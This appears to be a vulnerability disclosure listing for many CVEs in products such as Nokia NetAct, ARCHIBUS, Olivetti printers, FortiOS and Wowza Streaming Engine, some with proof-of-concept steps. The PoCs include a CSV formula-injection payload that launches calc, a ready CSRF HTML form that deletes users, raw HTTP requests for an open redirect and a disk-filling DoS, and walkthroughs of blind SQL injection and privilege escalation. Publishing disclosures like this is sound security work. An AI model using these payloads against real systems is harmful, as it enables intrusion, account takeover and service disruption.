Vulnerability Description: Multiple Cross-Site Scripting - CWE-79
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29540
CVSv3: 6.1
Severity: Medium
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net 4.2 is affected by Multiple XSS issues. Unauthenticated remote attackers can inject arbitrary web script or HTML into an HTTP GET parameter that reflects user input without sanitization. This exists on numerous application endpoints.
Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection - CWE-78)
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29539
CVSv3: 9.8
Severity: Critical
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.
Vulnerability Description: Improper Access Control - CWE-284
Software Version: 4.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29538
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
RESI Gemini-Net Web 4.2 is affected by Improper Access Control in authorization logic. An unauthenticated user is able to access some critical resources.
Vulnerability Description: Cross-Site Scripting Stored (Administration of Measurements) – CWE-79
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28867
CVSv3: 5.4
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through Administration of Measurements web site section, can arbitrary upload a file with a filename that contains an HTML code, more specifically javascript code inside some HTML tags.
Affected Endpoints
· URL: https://hostname//aom/html/EditTemplate.jsf
· URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf?tab=3
· Parameter: templateName
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
This first step consists in visiting the vulnerable page and injecting the malicious payload as value of the parameter “Template Name”.
The result is that the JavaScript code will be executed as depicted by the following picture.
Security Impact
By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.
Vulnerability Description: Improper Access Control- CWE-284
Software Version: < R18 Firmware v4.13.00
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28866
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Multiple Improper Access Control was discovered in Nokia AirFrame BMC Web GUI < R18 Firmware v4.13.00. It does not properly validate requests for access to (or editing of) data and functionality in all endpoints under /#settings/* and /api/settings/*. By not verifying the permissions for access to resources, it allows a potential attacker to view pages, with sensitive data, that are not allowed, and modify system configurations also causing DoS, which should be accessed only by user with administration profile, bypassing all controls (without checking for user identity).
Affected Endpoints
· URL: https://[IP]/#settings/ext_users
· URL: https://[IP]/#settings/redundancy
· URL: https://[IP]/#settings/services/edit/2
· URL: https://[IP]/#settings/mouse
· URL: https://[IP]/#settings/log
· URL: https://[IP]/#settings/pef
· URL: https://[IP]/#settings/smtp
· URL: https://[IP]/#settings/ssl
· URL: https://[IP]/#settings/firewall
· URL: https://[IP]/#settings/sol
· URL: https://[IP]/api/settings/*
Step-by-step instructions and PoC
The following images show some vulnerable endpoints, as PoC, that can be accessed by an unauthorized user:
Fig. 1
Fig. 2
The following steps show that an Operator user is able to edit configuration pages bypassing both access controls on the endpoint and client side access controls. In the specific case, the endpoint under analysis is: https://[IP]/#settings/redundancy.
Fig. 3
As a first step, you can enable any javascript by removing the "disabled" attribute within the "select" and "a" tags..
Fig. 4
The next image shows the request sent by the nonprivileged operator user to change the configuration and its response
Fig. 5
The last image shows that the Operator user has successfully changed the configuration.
Fig. 6
Vulnerability Description: Cross-Site Scripting Stored (Site Configuration Tools) – CWE-79
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28865
CVSv3: 5.4
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Site Configuration Tool website section. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through Site Configuration Tool web site section, can arbitrary upload a file with a filename that contains an HTML code, more specifically javascript code inside some HTML tags.
Affected Endpoints
· URL: https://hostname/netact/sct
· HTTP Parameter: filename
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
This first step consists in visiting the vulnerable page and injecting the malicious payload exploiting the Unrestricted File Upload vulnerability.
The result is that the JavaScript code will be executed as depicted by the following picture.
Security Impact
By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.
Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File (‘CSV Injection’) – CWE-1236
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28864
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include malicious code, which is then downloaded as a .csv or .xlsx file and executed on a victim machine. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used
Step-by-step instructions and PoC
A remote user, authenticated to the Nokia NetAct Web Page, through Administration of Measurements web site section, can submit the payload “=50+60+cmd|’ /C calc ‘!A0” as the templateName of the component domains objects.
Affected Endpoints
· URL: https://hostname//aom/html/EditTemplate.jsf
· URL: https://hostname//aom/html/ViewAllTemplatesPage.jsf
Parameter: templateName
The following payload shows the vulnerable templateName parameter into which the malicious content is injected from the /aom/html/EditTemplate.jsf POST Request:
This image below shows the operation that the victim does when he chooses to export the malicious content in CSV format.
The following image shows how the export request does not sanitize the malicious content when downloading the CSV file format from the /aom/html/ViewAllTemplatesPage.jsf POST Request.
As shown in the next screenshot, the malicious payload is finally executed. In our specific case the administrator’s machine is opening Microsoft Calculator.
Security Impact
By exploiting this issue an attacker is able to inject arbitrary formulas into CSV files.
This can potentially lead to remote code execution at client side (DDE) or to data leakage via maliciously injected hyperlinks.
Vulnerability Description: Unrestricted Upload of File with Dangerous Type – CWE-434
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28863
CVSv3: 8.8
Severity: High
Credits: Andrea Carlo Maria Dattola, Raffaella Robles, Massimiliano Brolli
An issue was discovered in Nokia NetAct 22. A remote user, authenticated to the website, can visit the Site Configuration Tool section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.
Step-by-step instructions and PoC
A remote user, authenticated to the NOKIA NetAct Web Page, through Site Configuration Tool web site section, can arbitrary upload potentially dangerous files without restrictions
Affected Endpoints
· URL: https://hostname/netact/sct
· HTTP Parameter: operation, dir
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
This first step consists in the successful arbitrary uploading of a file exploiting the affected URL inside the machine. In the specific casa it has been uploaded a text file containing the EICAR test string, which aims to simulate a malware that is recognized from all Antivirus solutions.
In next picture it is possible to see that file has been successfully uploaded.
For further information about EICAR: https://www.eicar.org/?page_id=3950
Security Impact
This vulnerability would allow an attacker to exploit the platform by injecting malware and, under certain conditions, to execute code in the remote machine.
Vulnerability Description: SQL Injection Multiple Vulnerabilities - CWE-89
Software Version: <26.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-28862
CVSv3: 9.8
Severity: Critical
Credits: Claudio Rizzo, Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
In ARCHIBUS Web Central <26.2, multiple SQL Injection vulnerabilities occur in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
NOTE: This vulnerability is fixed in all versions, even those that are no longer supported by the maintainer.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27880
CVSv3: 4.8
Severity: Medium
Credits: Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli
The Web application of F5 SDC doesn't check properly the parameters sent as input in HTTP requests, before saving them in the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.
Step-by-step instructions and PoC
An authenticated remote user can inject arbitrary code aiming to trigger malicious javascript code on browsers which visit infected pages
Affected Endpoints
Malicious javascript code is injected through the parameter “User Name” as shown below:
Figure 1
The previously injected malicious code is stored within the page.
Figure 2
Vulnerability Description: Stored Client-Side Template Injection-CWE-1336
Software Version: 5.1.0, 5.2.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27662
CVSv3: 4.8
Severity: Medium
Credits: Valerio Alessandroni, Matteo Brutti, Massimiliano Brolli
In Traffix Signal Delivery Controller 5.1.0 and 5.2.0, stored client-side template injection (CSTI) was possible, which could lead to code execution.
Step-by-step instructions and PoC
An authenticated remote user can inject arbitrary code aiming to exploit the template engine to execute malicious javascript code on browsers which visit infected pages.
Affected Endpoints
Malicious javascript code is injected through the parameter “User Name”, inserting an operation (e.g., in this case {{7*7}} ) to be executed by the victim’s browser as shown below:
Figure 1
The previously injected malicious code is stored within the page and executed as the page is loaded in the browser.
Figure 2
Vulnerability Description: Absolute Path Traversal – CWE-36
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26484
CVSv3: 4.9
Severity: Medium
Credits: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli
The web server fails to sanitize the input data allowing a remote authenticated attacker to read arbitrary files on the system. By manipulating the resource name in the GET requests referring to files with absolute paths, it is possible to access arbitrary files stored on the filesystem, including application source code, configuration files and critical system files.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79
Software Version: 6.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-26483
CVSv3: 4.8
Severity: Medium
Credits: Luca Carbone, Antonio Papa, Vincenzo Nigro, Massimiliano Brolli
Cross-site scripting Reflected (XSS) vulnerability affects the Veritas Operations Manager application, which allows authenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization.
The Veritas Operations Manager web application does not properly check parameters sent via GET methods which are included in the server response.
Vulnerability Description: CWE-79: Cross-Site Scripting Stored
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25344
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Luca Carbone, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application doesn't properly check parameters, sent in a /dvcset/sysset/set.cgi POST request via the arg01.Hostname field, before saving them on the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
The vulnerable functionality can be reached through the following actions:
Affected Endpoints
Below are the evidences with the vulnerability details and the payloads used.
Figure 1: Administrative page to change the Host name
Figure 2: The malicious payload will be URL encoded, to bypass the client-side filters
Figure 3: /jobs page stored javascript code
Vulnerability Description: CWE-400: Denial of Service
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25343
CVSv3: 7.5
Severity: High
Credits: Mattia Campanelli, Luca Carbone, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Denial of Service. An unauthenticated attacker, who can send POST requests to the /download/set.cgi page by manipulating the failhtmfile variable, is able to cause interruption of the service provided by the Web Application.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
The vulnerability is an unauthenticated POST request to the page /download/set.cgi. The web application get on system error by manipulating the variable failhtmfile and adding a relative path to a non-existent file, with most of the common path traversal payloads:
…and so on.
After that, all the resources of the Web Application will answer 404 Not Found, until the printer is restarted.
Affected Endpoints
Below are the evidences with the vulnerability details and the payloads used.
Figure 1: System error - 404 Not Found on all resources
Vulnerability Description: CWE-284: Improper Access Control
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25342
CVSv3: 8.1
Severity: High
Credits: Vincenzo Nigro, Massimiliano Brolli
An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application is affected by Broken Access Control. It does not properly validate requests for access to data and functionality under the /mngset/authset path. By not verifying permissions for access to resources, it allows a potential attacker to view pages that are not allowed.
NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.
Step-by-step instructions and PoC
If you have access to the credentials of a user (non-administrator), with at least one system administrator permission (as shown in Figure 1), it is possible to modify the details of any user, even of an administrator, including the password: the following figure shows the permissions of testpt user.
Figure 1: Permission needed to reproduce the attack
Once you logged in as testpt user, you have to click on “Impostazioni di gestione” and then on “Riavvio/Reset” while intercepting the request using burpsuite.
Figure 2: Panel of testpt user
Figure 3: HTTP request intercepted when clicking on “riavvio/reset”
At this point, by substituting the following URL is possible to spawn the admin panel with all the users of the system
Figure 4: Admin panel with all user settings, from the unprivileged account testpt
By clicking on any user you can bring up the properties panel, where you can edit his information, including its password.
Figure 5: Properties panel of user Admin, from the unprivileged account testpt
By clicking “Invia” POST request will be made, and the password of the user will be modified.
Figure 6: POST request to change Admin password
In this way you can be able to login in as Admin user with the new password and then you can create new accounts or edit all kind of settings.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-43080
CVSv3: 5.4
Severity: Medium
Credits: Massimiliano Ferraresi, Massimiliano Brolli
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5 may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack through the URI parameter via the Threat Feed IP address section of the Security Fabric External connectors.
Affected Endpoints
• URL: https://x.x.x.x/api/v2/monitor/system/external-resource/entry-list?mkey=
Step-by-step instructions and PoC
An attacker have to create a malicious HTTP server reachable from fortigate, in this case we created an http server with a malicious list of XSS payload (e.g. xss2.txt):
Figure 1 Http server with xss payload
An attacker have to add an external “IP Address" connector from this fields:
· Security Fabric > External Connectors > Create New > Ip Address
Figure 2 External Connectors page
In the “name” and “comment” fields we wrote arbitrary values, disable HTTP basic authentication and in the “URI of external resource” we inserted the address of our webserver with the path of xss payloads:
Figure 3 Configuring remote address
Click on “ok” and save the setting, after 5 minute the Fortigate will contact the server and it parses our file:Click on “ok” and save the setting, after 5 minute the Fortigate will contact the server and it parses our file:
Figure 4 Fortigate parse xss2.txt file
Now click on “View Entries” tab:
Figure 5 View invalid entries
And a malicious xss payloads (javscript code) will run correctly:And a malicious xss payloads (javscript code) will run correctly:
Figure 6 javascript alert
Vulnerability Description: Multiple Stored Cross-Site Scripting - CWE-79
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41555
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
Vulnerability Description: Multiple Broken Access Control- CWE-284
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41554
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints:
/archibus/schema/ab-edit-users.axvw, /archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
Vulnerability Description: Multiple User Session Vulnerabilities - CWE-1018
Software Version: 21.3.3.815
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41553
CVSv3: 9.8
Severity: Critical
Credits: Luca Carbone, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED **
In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assign a session token that could be already in use by another user. It was therefore possible to access the application through a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token, client-side, simply by making an unauthenticated GET Request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token, continuing to keep the inserted one, as the identifier of the entire session. This is fixed in all recent versions, such as version 26.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020.
Vulnerability Description: Open Redirect - CWE-601
Software Version: <= 2019.05
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-38123
CVSv3: 6.1
Severity: Medium
Credits: Veno Eivazian, Massimiliano Brolli
The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/device.save.do'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
The application presents an Open Redirect on the Host parameter, when the /device.save.do endpoint is requested via an HTTP POST request.
To exploit the vulnerability, the following HTTP request is used:
POST /device.save.do HTTP/1.1
Host: this.is.my.domain.evil.net
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://hostname
Connection: close
Referer: https://hostname/device.edit.do?deviceID=201
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
An attacker can send a link containing JavaScript code that allows a user who runs the code to be automatically redirected to a domain owned by the attacker himself.
The redirect is performed via the HTTP Location response header.
Figure 1: Open Redirect
The victim is thus redirected to a malicious domain:
Figure 2: Open Redirect
To perform this attack, the user does not need to be authenticated to the target application.
Vulnerability Description: Missing Authentication for Critical Function - CWE-306
Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-36200
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli
Under certain circumstances an unauthenticated user could access the web API for Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.2 and enumerate users.
Vulnerability Description: Uncontrolled Resource Consumption – CWE-400
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35492
CVSv3: 6.5
Severity: Medium
Credits: Veno Eivazian, Massimiliano Brolli
A remote user, authenticated to the Wowza Streaming Engine web interface, through Virtual Host Monitoring section, could exhaust filesystem resources, resulting in a denial of service (DoS) condition on an affected application. This vulnerability is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability by requesting random virtual host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. Manual intervention is required to free filesystem resources and return the application to an operational state.
To exploit the vulnerability, intercept the browser session with a proxy like Burp Suite.
Then, go to the Virtual Host Monitoring section:
Figure 1: DoS - Virtual Host Monitoring - Web Interface
Click here to enlarge the image
An HTTP request will be automatically performed to view the historical data of the default virtual host.
The request on Burp Suite will be like the next screenshot.
Figure 2: DoS - Regular HTTP request
Click here to enlarge the image
Every time virtual host monitoring data is requested, a new file is created or appended on the filesystem.
By default, this is the starting condition on the folder /usr/local/WowzaStreamingEngine-4.8.11+5/stats/:
Figure 3: DoS - Filesystem on normal condition
Click here to enlarge the image
The attack can be performed using Burp Repeater, using the same request captured with the proxy, changing only the vhost parameter value. The response will be HTTP 200 OK:
Figure 4: DoS - New virtual host HTTP request
Click here to enlarge the image
Alternatively, the same can be achieved with the following payload:
GET /enginemanager/server/vhost/historical.jsdata?vhost=_defaultVHost_pippo_&periodStart=2021-06-03T13%3A47%3A44%2B02%3A00&periodEnd=2021-06-03T14%3A47%3A44%2B02%3A00&_=1622724285834 HTTP/1.1
Host: wse.local:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://wse.local:8088/enginemanager/Home.htm
Cookie: JSESSIONID=E1EC2C1050D74EB0E4DA9474789E8F5E; lastMangerHost=http%3A//127.0.0.1%3A8087; showRightRail=true; DoNotShowFTU=false; lastTab=Basic
On the filesystem side, a new file of 280 KB will be created, as depicted by the following screenshot:
Figure 5: DoS - New virtual host file on the filesystem
Click here to enlarge the image
To massively exploit this condition, multiple requests with different vhost values have to be sent.
To send those requests reliably, the browser session has to be left active.
Session timeout can be prevented by installing a browser plugin like Tab Reloader and configure it to refresh the tab every 1 minute, like the following example:
Figure 6: DoS - Session timeout prevention - Tab Reloader
Click here to enlarge the image
Then it is possible to create a custom script to randomize the vhost parameter to a new value to be sent every time.
./dos-exploit-wse.py
When executing such tool, it is possible to exhaust the filesystem by creating 5.5 GB of files every 30 minutes.
The effect can be summarized on the following screenshot, which depicts multiple files created on the filesystem and the difference of the stats directory size after 30 minutes of the tool execution:
Figure 7: DoS - DoS exploit effect
Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35491
CVSv3: 8.1
Severity: High
Credits: Veno Eivazian, Massimiliano Brolli
A remote attacker is able to delete a user without the victim's knowledge, by enticing an authenticated admin user to visit an attacker's web page. The application does not implement a CSRF token for the GET request. An attacker can craft an HTML page with a forged request on /enginemanager/server/user/delete.htm URL and send it to the victim.
Prerequisites: None.
Step-by-step instructions and PoC
An authenticated user that visits a crafted HTML page with a forged request can delete a user on Wowza Streaming Engine on behalf of an administrator.
To exploit the vulnerability, a new user needs to be created for testing purpose.
First, create a new user from Server -> Users -> Add User.
Figure 1: CSRF - User creation
Then, copy the following HTML to a file served on another machine, in this case a local Kali Linux, in the file: /var/www/html/csrf-delete-user.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wse.local:8088/enginemanager/server/user/delete.htm">
<input type="hidden" name="userName" value="pippo" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Enable the local web server on the attacker machine:
sudo /etc/init.d/apache2 start
From an authenticated browser session to Wowza Streaming Engine with administrative privileges, open a new tab and go to the page http://127.0.0.1/csrf-delete-user.html.
Figure 2: CSRF - PoC HTML page
Click here to enlarge the image
Select Submit request, to force the administrator to delete the selected user.
The request will be sent to the web application, and the user will be deleted:
Figure 3: CSRF - User deleted
Click here to enlarge the image
It was also found that the wowzaSecurityToken HTTP parameter is not present in this GET request. In this case, the application accepts the request and processes it every time.
This is not true in the case of user creation, where that parameter is present and correctly validated.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: <= 2.44
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35490
CVSv3: 5.4
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk versions 2.44 and previous allow Stored XSS on a specific parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35489
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk version 2.40-2 allows /thruk/#cgi-bin/extinfo.cgi?type=2&host=[HOSTNAME]&service=[SERVICENAME]&backend=[BACKEND] Reflected XSS on 'host' and 'service' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into extinfo.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
The vulnerable functionality can be reached through the following URL:
A PoC is possible inserting the malicious payload in one of the host or service fields (GET Request):
This occurs due to the closure of a comment, as demonstrated in the next screenshot.
Figure 1: Reflected XSS on extinfo.cgi – Payload 1
Some other screenshots demonstrating the vulnerability:
Figure 2: Reflected XSS on extinfo.cgi – Payload 2
Figure 3: Reflected XSS on extinfo.cgi – Payload 3
Figure 4: Reflected XSS on extinfo.cgi – Payload 4
Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35488
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli
Thruk version 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title=[TITLE] Reflected XSS on 'host' and 'title' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into status.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
The vulnerable functionality can be reached through the following URLs:
A PoC is possible inserting the malicious payload in one of the host or title fields (GET Request):
This occurs due to the closure of a comment, as demonstrated in the next screenshot.
Figure 1: Reflected XSS on status.cgi – Payload 1
Vulnerability Description: Boolean Blind SQL Injection - CWE-89
Software Version: <= 11.1.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35487
CVSv3: 6.5
Severity: Medium
Credits: Marco Raimondi, Francesco Pigini, Massimiliano Brolli
A remote user, authenticated on the Broadcast Message Center, can navigate the application in the ALERTS --> Manage Alerts section. Within Search Options it is possible to select Basic Search and by specifying the extIdentifier parameter, arbitrary queries in the application database can be executed.
Through these queries it is possible to extrapolate arbitrary information, not foreseen by the application logic, such as the user of the system that executes the queries, the dbms version, etc.
Depending on the permissions the user has on the database, different types of queries are possible and consequently different types of information can be extracted.
Payload used to exploit the vulnerability:
Figure 0: Payload
This first step consisted of inserting a single quote (') inside the search bar, in order to evaluate the behavior of the application. The result was an error message inside the database:
Figure 1: Single quote database error message
At this point we tried to see if it was possible to execute arbitrary queries on the application. In this specific case, we tried to get the name of the user who executes the queries on the database. To do this we combined the mid() and user() functions. Being a Blind SQL Injection, if the query result was "true" we would get all the database alerts, otherwise we would get nothing, and we would have to go on with the letters of the alphabet:
Figure 2: True query request
Figure 3: True query page behavior with alarms
The result of the query is the entire list of alarms, so the first letter of the username is after "m" in the alphabet.
Figure 4: False query page behavior
Using the letter n" we get nothing. Therefore, the first letter of the username is "n". Proceeding in this way it is possible to obtain the full name of the user.
At this point we try to confirm the username found by using the user() function directly:
Figure 5: User() function true request
Figure 6: User() function true response page
As we can see from the last image, using only the user() function with the name found from the previous steps, we get again the complete list of alarms, confirming that the username is correct.
Similarly, it is possible to proceed to get more information from the database.
Vulnerability Description: Incomplete Cleanup. – CWE-459
Software Version: <=18B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32571
CVSv3: 4.9
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In OSS-RC systems of the release 18B and older during data migration procedures certain files containing usernames and passwords are left in the system undeleted but in folders accessible by top privileged accounts only.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.
Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668
Software Version: < 21.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32570
CVSv3: 4.9
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
